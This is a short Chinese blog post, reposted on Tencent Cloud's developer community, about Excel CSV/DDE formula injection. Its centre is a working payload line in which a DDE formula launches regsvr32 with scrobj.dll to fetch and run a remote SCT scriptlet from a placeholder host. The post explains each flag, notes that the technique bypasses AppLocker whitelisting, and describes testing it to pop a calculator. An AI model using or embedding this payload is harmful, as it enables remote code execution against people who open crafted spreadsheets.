Microsoft Excel CSV 文件代码执行

用户1423082

发布于 2024-12-31 18:24:01

9900

代码可运行

文章被收录于专栏：giantbranch's bloggiantbranch's blog

运行总次数：0

代码可运行

在推特上看到这个攻击，在execl2017测试了一下在virustotal的评论上说是THOR APT Scanner捕获到的

利用代码

fillerText1,fillerText2,fillerText3,=MSEXCEL|'\..\..\..\Windows\System32\regsvr32 /s /n /u /i:http://RemoteIPAddress/SCTLauncher.sct scrobj.dll'!''

简析

因为execl遇到等号就是公式开始的地方，继而执行后面的代码

regsvr32 /s /n /u /i:http://RemoteIPAddress/SCTLauncher.sct scrobj.dll

其中的参数： silent mode (/s) unregistering (/u) not calling DLL register server (/n) passing the required DLL to load via parameter (/i)

scrobj.dll是 Microsoft’s Script Component 运行库，使用这个dll获取并执行Windows Script Component （即sct文件）

而regsvr32 可以绕过AppLocker白名单并执行脚本

测试

默认安装的execl会有安全警告（声明），点启用

又以警告

再点击是，就会弹出计算器（360会拦截regsvr32利用攻击）

references

https://www.virustotal.com/en/file/34b27a622b1ba26f4c7eb8281e84a60b1d5aabcaa454ab1d83b411c86ffaa800/analysis/ https://xorl.wordpress.com/2017/12/11/microsoft-excel-csv-code-execution-injection-method/ https://gist.github.com/enigma0x3/469d82d1b7ecaf84f4fb9e6c392d25ba https://twitter.com/G0ldenGunSec/status/939215702073991168

本文参与腾讯云自媒体同步曝光计划，分享自作者个人站点/博客。

原始发表：2018-01-17，如有侵权请联系 cloudcommunity@tencent.com 删除

microsoft

本文分享自作者个人站点/博客前往查看

如有侵权，请联系 cloudcommunity@tencent.com 删除。

本文参与腾讯云自媒体同步曝光计划，欢迎热爱写作的你一起参与！

登录后参与评论

0 条评论

热度

Microsoft Excel CSV 文件代码执行

Microsoft Excel CSV 文件代码执行

利用代码

简析

测试

references

社区

活动

圈层

关于

腾讯云开发者

热门产品

热门推荐

更多推荐